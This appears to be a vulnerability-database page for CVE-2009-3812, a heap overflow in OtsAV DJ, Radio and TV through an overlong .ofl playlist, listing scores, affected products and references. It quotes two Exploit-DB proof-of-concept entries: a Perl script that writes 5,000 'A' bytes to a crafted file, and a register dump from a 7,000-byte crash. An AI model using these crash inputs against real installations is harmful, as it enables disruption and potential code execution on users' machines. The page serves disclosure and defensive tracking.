CVE-2009-3812
published 2009-10-27CVE-2009-3812: Heap-based buffer overflow in OtsAV DJ trial version 1.85.64.0, Radio trial version 1.85.64.0, TV trial version 1.85.64.0, and Free version 1.77.001 allows…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.90%
93.3th percentile
Heap-based buffer overflow in OtsAV DJ trial version 1.85.64.0, Radio trial version 1.85.64.0, TV trial version 1.85.64.0, and Free version 1.77.001 allows remote attackers to execute arbitrary code via a long playlist in an Ots File List (.ofl) file.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| otslabs | otsav_dj | — | — |
| otslabs | otsav_radio | — | — |
| otslabs | otsav_tv | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
otsAV DJ/TV/Radio - Multiple Local Heap Overflows (PoC)
exploitdb·2009-07-10
CVE-2009-3812 otsAV DJ/TV/Radio - Multiple Local Heap Overflows (PoC)
otsAV DJ/TV/Radio - Multiple Local Heap Overflows (PoC)
---
----------------------------------the first Poc------------------------------------
#!/usr/bin/perl
# OtsAv DJ [.olf] Local Heap Overflow Poc
# Down : http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetup.exe
# Desc : 7000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >> Import List >> As playlist >>
# BOOOOOOOOOOOOOOOOOOOM
# register of 7000 A'
# EAX 41414141
# ECX 00E5448C OtsAVDJt.00E5448C
# EDX 41414141
# EBX 00E54488 OtsAVDJt.00E54488
# ESP 02C6FE1C
# EBP 00E0D328 OtsAVDJt.00E0D328
# ESI 00000000
# EDI 0174C070 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Exploit-DB
otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)
exploitdb·2009-07-09
CVE-2009-3812 otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)
otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)
---
#!/usr/bin/perl
# Found By :: HACK4LOVE
# all i want say welcom back 3asfh
# otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
# http://x.download.otszone.com/static/otsavdjtrialsetup.exe
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.OFL');
print myfile $crash;
########################################################################################
# milw0rm.com [2009-07-09]
No writeups or analysis indexed.
http://osvdb.org/55747http://packetstormsecurity.org/0907-exploits/otsav-overflow.txthttp://secunia.com/advisories/35738http://www.exploit-db.com/exploits/9113http://www.vupen.com/english/advisories/2009/1861https://exchange.xforce.ibmcloud.com/vulnerabilities/51628http://osvdb.org/55747http://packetstormsecurity.org/0907-exploits/otsav-overflow.txthttp://secunia.com/advisories/35738http://www.exploit-db.com/exploits/9113http://www.vupen.com/english/advisories/2009/1861https://exchange.xforce.ibmcloud.com/vulnerabilities/51628
2009-10-27
Published